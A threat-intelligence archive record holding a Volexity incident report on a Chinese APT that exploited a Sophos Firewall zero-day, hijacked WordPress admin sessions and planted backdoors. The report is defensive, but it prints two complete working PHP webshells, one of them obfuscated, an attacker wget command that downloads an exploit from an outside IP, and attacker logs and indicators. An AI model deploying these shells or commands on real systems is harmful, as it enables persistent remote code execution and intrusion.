{
	"id": "1d011769-6e25-4326-8a6c-03885d037a7d",
	"created_at": "2026-04-06T00:06:37.439103Z",
	"updated_at": "2026-04-10T03:24:47.417148Z",
	"deleted_at": null,
	"sha1_hash": "fc8b9559e36a8486aa19b9fa384500428755eea5",
	"title": "DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1408883,
	"plain_text": "DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious\r\nBreach\r\nBy mindgrub\r\nPublished: 2022-06-15 · Archived: 2026-04-05 13:37:34 UTC\r\nVolexity frequently works with individuals and organizations heavily targeted by sophisticated, motivated, and well-equipped threat actors from around the world. Some of these individuals or organizations are attacked infrequently or on an\r\nirregular basis, while others see a barrage of attacks nearly every week. Regardless of the attack frequency, Volexity keeps\r\nits guard up, looking for new and old threats however they manifest themselves.\r\nEarlier this year, Volexity detected a sophisticated attack against a customer that is heavily targeted by multiple Chinese\r\nadvanced persistent threat (APT) groups. This particular attack leveraged a zero-day exploit to compromise the customer’s\r\nfirewall. Volexity observed the attacker implement an interesting webshell backdoor, create a secondary form of persistence,\r\nand ultimately launch attacks against the customer’s staff. These attacks aimed to further breach cloud-hosted web servers\r\nhosting the organization’s public-facing websites. This type of attack is rare and difficult to detect. This blog post serves to\r\nshare what highly targeted organizations are up against and ways to defend against attacks of this nature.\r\nNote that the vulnerability discussed in this article was resolved by Sophos on the 25th March 2022 as indiciated in\r\nthis advisory.\r\nDetecting a Firewall Breach\r\nOn March 8, 2022, through its Network Security Monitoring service, Volexity detected anomalous activity emanating from a\r\ncustomer’s Sophos Firewall. Volexity received alerts from custom signatures it had deployed that immediately put the device\r\nunder suspicion of being compromised. This led to a forensic investigation where Volexity acquired memory, selective files,\r\nand disk images from the Sophos Firewall. Analysis of the data led to the discovery of a backdoor on the firewall, as well as\r\nevidence of exploitation dating back to March 5, 2022. Volexity’s investigation further expanded once it discovered the\r\nattacker was using access to the firewall to conduct man-in-the-middle (MITM) attacks. The attacker used data collected\r\nfrom these MITM attacks to compromise additional systems outside of the network where the firewall resided.\r\nAfter Volexity’s investigation, Sophos published an advisory on March 25, 2022, describing a remote code execution (RCE)\r\nvulnerability (submitted by a third-party) in its firewalls covered by CVE-2022-1040. Volexity believes this is the same\r\nvulnerability exploited in its investigation, as the customer’s firewall was up to date and met the criteria for remote\r\nexploitation. Volexity attributes these attacks to a Chinese APT group previously reported to Volexity Threat Intelligence\r\ncustomers under the name “DriftingCloud“. (Note: The information in this post was available to Volexity Threat\r\nIntelligence customers in TIB-20220408 and TIB-20220429.)\r\nIn this blog post, Volexity will discuss the following:\r\nActions the attacker took after successfully compromising the Sophos Firewall\r\nhttps://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/\r\nPage 1 of 8\n\nHow the attacker used session cookies collected via MITM attacks to compromise external systems outside of the\r\nnetwork where the firewall resided\r\nWebshells and malware installed by the attacker, and actions taken on the external system after successful\r\ncompromise\r\nRecommendations to monitor for similar compromises in your network\r\nAn overview of the attack flow is given below:\r\nBreaching the Firewall\r\nVolexity first identified intrusion activity after detecting suspicious traffic originating from the Sophos Firewall to key\r\nsystems in its customer’s networks. It was quickly determined the device was likely compromised, and an investigation\r\nimmediately followed. Volexity first collected memory from the device, and later collected a full disk image to assist in its\r\ninvestigation. Volexity suspected the external-facing User Portal component of the Sophos Firewall might be involved; it\r\nwas a likely attack vector given it was the only Internet-exposed component of this network. As a result, Volexity reviewed\r\nthe web access logs for the device before starting other analysis tasks. These logs revealed significant and repeated\r\nsuspicious access aimed at a valid JSP file (login.jsp), as shown in this sample log entry:\r\n[07/Mar/2022:09:25:58 +0000] \u003credacted\u003e “POST /userportal/webpages/myaccount/login.jsp HTTP/1.1” 200 – 0\r\n“https:// \u003credacted\u003e/userportal/jlbed/fikds4/BQ.jsp” “Mozilla/5.0 (Windows NT 6.1; Win64; x64)\r\nAppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36”\r\nThese requests show a successful HTTP 200 status code. However, inspection of the underlying code for “login.jsp” did not\r\nshow any anomalies or modifications that would lead Volexity to believe this file had been backdoored. It should be noted\r\nthat the file “BQ.jsp”, seen in the Referrer field, does not exist as part of the User Portal.\r\nAt this point, Volexity implemented a plan to set up a packet capture on the device to intercept inbound web requests. The\r\nattacker was active when Volexity did this, so it did not take long to capture traffic and confirm this traffic was out of the\r\nordinary.\r\nhttps://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/\r\nPage 2 of 8\n\nFigure 1. DriftingCloud interacting with a webshell on the Sophos Firewall\r\nPrior to capturing network traffic, Volexity captured system memory using Volexity Surge Collect. Data observed from\r\nnetwork traffic further aided the investigation of the memory sample. The network traffic combined with analysis of the\r\nmemory sample proved to be productive for piecing together various aspects of the attacker’s activity.\r\nOne item identified was the presence of large base64 strings adjacent to suspicious requests made to the User Portal\r\ncomponent of the device (Figure 2) similar to those seen in Figure 1.\r\nFigure 2. Example suspicious strings in memory\r\nUsing the adjacent strings as a pivot point, Volexity searched on the firewall’s disk for files containing strings similar to\r\nthose adjacent to the base64 blobs in memory. In doing so, Volexity identified the following legitimate component of the\r\nfirewall had been modified by the attacker:\r\n/usr/share/webconsole/WEB-INF/classes/cyberoam/sessionmanagement/SessionCheckFilter.class\r\nThe investigation revealed the attacker timestomped this file, so its last modify time was the same as other files in this\r\ndirectory. This CLASS file is a legitimate component of the Sophos Firewall. Its purpose is to call SessionCheckHelper with\r\ncorrect parameters based on the current URI, which in turn verifies that the user has a valid session (and if not, it directs\r\nthem to log in). Without reverse-engineering the firewall’s web UI, Volexity assumes this helper is called when any request\r\nis made to any component of the Sophos Firewall’s portal. The attacker created their own version of this file containing\r\nmalicious logic. A decompilation of the malicious file using ByteCodeViewer is shown in Figure 3.\r\nhttps://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/\r\nPage 3 of 8\n\nFigure 3. A decompilation of the malicious SessionCheckFilter.class file\r\nIn summary, the malicious code added to SessionCheckFilter.class used the following workflow:\r\nCheck that the incoming request URI or “Accept” HTTP header contains the string “Applicationssid”; if this fails,\r\nproceed with legitimate functionality.\r\nCheck that the incoming request is a POST; if this fails, proceed with legitimate functionality.\r\nIf both checks pass, decode the POST body using base64 and AES using the key “a918c0e8d8153bfc”; this is likely a\r\npartial (16 character) MD5 of a plaintext password used on the attacker’s side.\r\nThe result of the decode should be another CLASS file which is loaded using SecureClassLoader.\r\nThis workflow effectively backdoored the Sophos Firewall with a webshell that could be accessed through any URL of the\r\nattacker’s choosing. The attacker attempted to blend in by accessing this webshell through requests against the “login.jsp”\r\nfile. At first glance, this might appear to be a brute-force login attempt instead of an interaction with a backdoor. The only\r\nreal elements that appeared out of the ordinary in the log files were the referrer values and the response status codes. CLASS\r\nfiles are compiled and not simply text files, which makes an edit like this not as trivial as with similar webshell cases. It is\r\nlikely the attacker decompiled the class (either by retrieving it from the firewall, or from a local firewall used for testing),\r\nand then created their own version locally before re-compiling it and placing it on the device.\r\nVolexity decoded some requests made by the attacker using this webshell and found the attacker was using the publicly\r\navailable BEHINDER framework. It is interesting to note that this is the same framework Volexity believed was leveraged\r\nby one or more Chinese APT groups involved in the recent zero-day exploitation of Confluence Servers systems by way of\r\nCVE-2022-26134.\r\nAdditional Findings from the Firewall\r\nIn addition to this webshell component, Volexity identified several other actions performed by the attacker on the Sophos\r\nFirewall that further compromised the victim and ensured persistence.\r\nThe attacker created VPN user accounts and associated certificate pairs on the firewall to facilitate legitimate remote\r\nnetwork access.\r\nAs part of the exploitation of the Sophos Firewall, the attacker wrote and executed a file on disk at the following\r\npath:\r\n/conf/certificate/pre_install.sh\r\nWhen executed, the “pre_install.sh” file runs a malicious command to download a binary, execute it, then delete it\r\nfrom disk. At the time of analysis, the binary was absent from the command-and-control (C2) server, and it was not\r\npresent in memory or on disk. This file did not appear to be a legitimate component of the firewall.\r\nMoving Beyond the Firewall\r\nhttps://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/\r\nPage 4 of 8\n\nWhile gaining access to the target’s Sophos Firewall was likely a primary objective, it appears this was not the attacker’s\r\nonly objective. Volexity discovered that the attacker used their access to the firewall to modify DNS responses for specially\r\ntargeted websites in order to perform MITM attacks. The modified DNS responses were for hostnames that belonged to the\r\nvictim organization and for which they administered and managed the content. This allowed the attacker to intercept user\r\ncredentials and session cookies from administrative access to the websites’ content management system (CMS). Volexity\r\ndetermined that in multiple cases, the attacker was able to access the CMS admin pages of the victim organization’s websites\r\nwith valid session cookies they had hijacked.\r\nThe log snippet below shows the first interaction with a victim web domain by the attacker:\r\n172.x.x.x – – – – [16/Mar/2022:08:19:57 +0000] “target.tld” “GET /wp-admin/\r\nHTTP/1.1” 200 46067 “-” “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101\r\nFirefox/97.0” “103.76.xx.xx”\r\nUsing these session cookies, the attacker was able to directly access the WordPress admin panel without sending a username\r\nand password, and they accessed a page that allows installation of additional plugins:\r\n172.x.x.x- – – – [16/Mar/2022:08:22:04 +0000] ” target.tld ” “GET /wp-admin/plugins.php HTTP/1.1” 200 42941\r\n“https://target.tld/wp-admin/” “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101\r\nFirefox/97.0” “103.76.xx.xx”\r\n172.x.x.x – – – – [16/Mar/2022:08:22:07 +0000] ” target.tld ” “GET /wp-admin/plugin-install.php HTTP/1.1” 200\r\n41547 “https://target.tld.org/wp-admin/” “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101\r\nFirefox/97.0” “103.76.xx.xx”\r\nThe attacker then searched for the File Manager plugin and installed it. This plugin can be used to perform file management\r\ntasks on the website, such as uploading, downloading, editing, or deleting a file:\r\n172.x.x.x – – – – [16/Mar/2022:08:26:21 +0000] “target.tld” “GET /wp-admin/plugins.php?\r\n_wpnonce=13241af34c\u0026action=activate\u0026plugin=wp-file-manager/file_folder_manager.php HTTP/1.1” 302 0\r\n“https://target.tld/wp-admin/plugin-install.php?s=file%20manager\u0026tab=search\u0026type=term” “Mozilla/5.0\r\n(Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0” “103.76.x.x”\r\n172.x.x.x – – – – [16/Mar/2022:08:26:22 +0000] “target.tld” “GET /wp-admin/plugins.php?\r\nactivate=true\u0026plugin_status=all\u0026paged=1\u0026s= HTTP/1.1” 200 43523 “https://target.tld/wp-admin/plugin-install.php?s=file%20manager\u0026tab=search\u0026type=term” “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0)\r\nGecko/20100101 Firefox/97.0” “103.76.x.x”\r\n172.x.x.x – – – – [16/Mar/2022:08:26:43 +0000] “target.tld” “GET /wp-admin/admin.php?\r\npage=wp_file_manager HTTP/1.1” 200 37492 “https://target.tld/wp-admin/plugins.php” “Mozilla/5.0 (Windows\r\nNT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0” “103.76.x.x”\r\nHaving successfully installed the File Manager plugin, the attacker used it to upload a PHP file, placing it in the March 2022\r\nWordPress uploads directory:\r\n172.x.x.x – – – – [16/Mar/2022:08:29:16 +0000] “target.tld” “GET /wp-admin/admin-ajax.php?\r\naction=mk_file_folder_manager\u0026_wpnonce=1fead1b621\u0026networkhref=\u0026cmd=ls\u0026target=l1_d3AtY29udGXteC71cGxvYWRzLzIwMjEvMTI\u0026\r\n\u003credacted\u003e.php\u0026reqid=1b191dc2be41a2 HTTP/1.1” 200 11 “https://target.tld /wp-admin/admin.php?\r\npage=wp_file_manager” “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0”\r\n“103.76.xx.xx”\r\nFinally, the attacker deactivated the File Manager plugin:\r\n172.x.x.x – – – – [16/Mar/2022:08:32:01 +0000] “target.tld” “GET /wp-admin/plugins.php?\r\naction=deactivate\u0026plugin=wp-file-manager%2Ffile_folder_manager.php\u0026plugin_status=all\u0026paged=1\u0026s\u0026_wpnonce=bc1ca29a43 HTTP/1.1” 302 0\r\n“https://target.tld/wp-admin/plugins.php” “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0)\r\nGecko/20100101 Firefox/97.0” “103.76.xx.xx”\r\nThe webshell was fairly short and consisted of the following PHP code, which appears to be a variation on the Weevely\r\nwebshell:\r\n\u003c?php\r\n$J=’Ktch(“/K$kh(.+K)K$kf/”,@fileK_get_contents(“pKhpK://inpuKt”K),$m)’;\r\n$e=’==1) {@oKb_stKart();@eKval(K@gzuncKomprKess(@x(@bKase64_KdecKode($’;\r\n$P=str_replace(‘VG’,”,’cVGreaVGtVGVGe_fVGunVGction’);\r\n$l=’$k=”1506aKdbd”;$Kkh=”7eKfK1ee10Kd884″;$kf=”9K82K58e20d7a0″K;’;\r\n$C=’K$p=”Kwton3r3P7tKKHoi9Uk”;functioKn Kx($Kt,$k){$c=stKKrlen($k)KK;$l=s’;\r\nhttps://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/\r\nPage 5 of 8\n\n$B=’trlen(K$t);$oK=””;for($iK=K0;$i\u003c$lK;){for($jK=K0;($j\u003c$cK\u0026\u0026$i’;\r\n$X=’r=@bKase64_enKcode(K@x(@gzcoKmpKKrKess($o),$k));printK(“$p$kKh$r$kf”);}’;\r\n$W=’m[1K]),K$k)));$KKo=@ob_get_contKentKs();@ob_KendK_clean()K;$’;\r\n$y='\u003c$l);$j++K,$i++K)K{$o.K=$t{$i}^$Kk{$j};}}reKturn K$oK;}if (@pregKK_ma’;\r\n$a=str_replace(‘K’,”,$l.$C.$B.$y.$J.$e.$W.$X);\r\n$S=$P(”,$a);$S();\r\n?\u003e\r\nThis is a simple shell that reads the file input, base64 decodes it, decompresses it, and then runs an eval() on the resulting\r\nPHP statement. Evidently this was not the attacker’s preferred shell, however, as they quickly installed a second shell with a\r\nname based on an existing PHP file. This is a popular webshell that appears to go by many names, including IceScorpion,\r\nand has the following contents:\r\n\u003c?php\r\n@error_reporting(0);\r\nsession_start();\r\n$key=”aece158[snipped]”; //该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond\r\n$_SESSION[‘k’]=$key;\r\nsession_write_close();\r\n$post=file_get_contents(“php://input”);\r\nif(!extension_loaded(‘openssl’))\r\n{\r\n$t=”base64_”.”decode”;\r\n$post=$t($post.””);\r\nfor($i=0;$i\u003cstrlen($post);$i++) {\r\n$post[$i] = $post[$i]^$key[$i+1\u002615];\r\n}\r\n}\r\nelse\r\n{\r\n$post=openssl_decrypt($post, “AES128″, $key);\r\n}\r\n$arr=explode(‘|’,$post);\r\n$func=$arr[0];\r\n$params=$arr[1];\r\nclass C{public function __invoke($p) {eval($p.””);}}\r\n@call_user_func(new C(),$params);\r\n?\u003e\r\nThis has similar functionality but uses AES128 encryption with a hardcoded password “aece158afa2f0f49”. This is the main\r\nshell that the attacker used in subsequent exploitation. Based on both PCAPs relating to this shell, other logs on the system,\r\nand analysis of the memory image using Volexity Volcano, Volexity was able to piece together a number of commands\r\nissued by the attacker. Some interesting observations are provided below:\r\nThe attacker cloned a GitHub repository for CVE-2021-4034 in an attempt to escalate their privileges.\r\nAfter this did not work, the attacker downloaded a custom implementation of the shared object (db.py) of the same\r\nexploit from a Github page owned by the attacker (which has since been taken down) .\r\nhttps://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/\r\nPage 6 of 8\n\nFigure 4. “Gooogleapis” GitHub user and repository containing tools related to compromise of Sophos Firewall devices\r\nThe same GitHub page also included a Sliver binary named “kstrp”. Volexity did not observe this specific file on an\r\ninfected system or in any command. This could suggest that the same repository was used in operations against other\r\ntargets.\r\nThe attacker also downloaded another file via wget which is believed to have been another attempt at privilege\r\nescalation on the web server. This file appears to have been an attempt to exploit CVE-2021-4034.\r\nwget http://192.248[.]125.58/cve2021-4034.py -O /tmp/x.py\r\nThe attacker used their access to this webserver to install three open-source malware families, including PupyRAT,\r\nPantegana and Sliver. Volexity did not find anything too remarkable about the usage and deployment of these backdoors.\r\nHowever, Volexity did find the server-side configuration for the Pantegana malware to be worth noting: the attacker\r\nattempted to operate as “The SWAG” via “SWAG, Inc.”. This looks to be a custom implementation, as it was found to differ\r\nfrom the default certificate.\r\nFigure 5. Customised SSL certificate leveraged by the Pantegana malware, shown in BinaryEdge\r\nConclusion\r\nDriftingCloud is an effective, well equipped, and persistent threat actor targeting five-poisons-related targets. They are able\r\nto develop or purchase zero-day exploits to achieve their goals, tipping the scales in their favor when it comes to gaining\r\nhttps://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/\r\nPage 7 of 8\n\nentry to target networks. It is critical for organizations that support or consist of targeted groups to have network monitoring\r\nsolutions in place in order to identify compromises when they inevitably occur. Compromise of gateway devices is a\r\nfrequent root cause for incidents investigated by Volexity, and compromising them often gives attackers a lead on defenders\r\nwho are often focused on endpoint and EDR solutions which are not present on these devices.\r\nSophos has published advice on mitigating this vulnerability in their advisory. Specifically, the advisory states the following:\r\n“Sophos has observed this vulnerability being used to target a small set of specific organizations primarily in the South Asia\r\nregion. We have informed each of these organizations directly. Sophos will provide further details as we continue to\r\ninvestigate. There is no action required for Sophos Firewall customers with the “Allow automatic installation of hotfixes”\r\nfeature enabled. Enabled is the default setting.”\r\nTo generically identify similar attacks to those discussed, Volexity recommends the following:\r\nDeploy network security monitoring and other mechanisms to detect and record traffic from gateway devices.\r\nFor Unix-based webservers, consider using auditd to enable easier investigation in the event of compromise.\r\nAsk vendors of perimeter devices (such as firewalls) what capabilities they have to detect a compromise, and what\r\nmethods would be available for you to investigate a compromise if one were to occur. Some vendors do not allow\r\naccess to perimeter devices which can complicate investigations of suspected compromise.\r\nTo prevent these specific attacks from being successful, Volexity recommends the following:\r\nUse the YARA rules listed on GitHub here to identify suspicious related activity.\r\nBlock the IOCs listed on GitHub here.\r\nRelated Indicators\r\nakamprod[.]com\r\n180.149.38.136\r\nu2d.servusers[.]com\r\nservusers[.]com\r\n95.85.71.23\r\n95.85.71.20\r\n5.188.228.40\r\n209.250.231.67\r\n158.247.200.24\r\n192.248.152.58\r\ngoogleanalytics.proxydns[.]com\r\n185.82.218.66\r\nSource: https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/\r\nhttps://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/"
	],
	"report_names": [
		"driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach"
	],
	"threat_actors": [
		{
			"id": "c42fe131-a81c-45bb-8f32-61f39263a7d4",
			"created_at": "2023-11-17T02:00:07.60084Z",
			"updated_at": "2026-04-10T02:00:03.45671Z",
			"deleted_at": null,
			"main_name": "DriftingCloud",
			"aliases": [],
			"source_name": "MISPGALAXY:DriftingCloud",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775433997,
	"ts_updated_at": 1775791487,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fc8b9559e36a8486aa19b9fa384500428755eea5.pdf",
		"text": "https://archive.orkl.eu/fc8b9559e36a8486aa19b9fa384500428755eea5.txt",
		"img": "https://archive.orkl.eu/fc8b9559e36a8486aa19b9fa384500428755eea5.jpg"
	}
}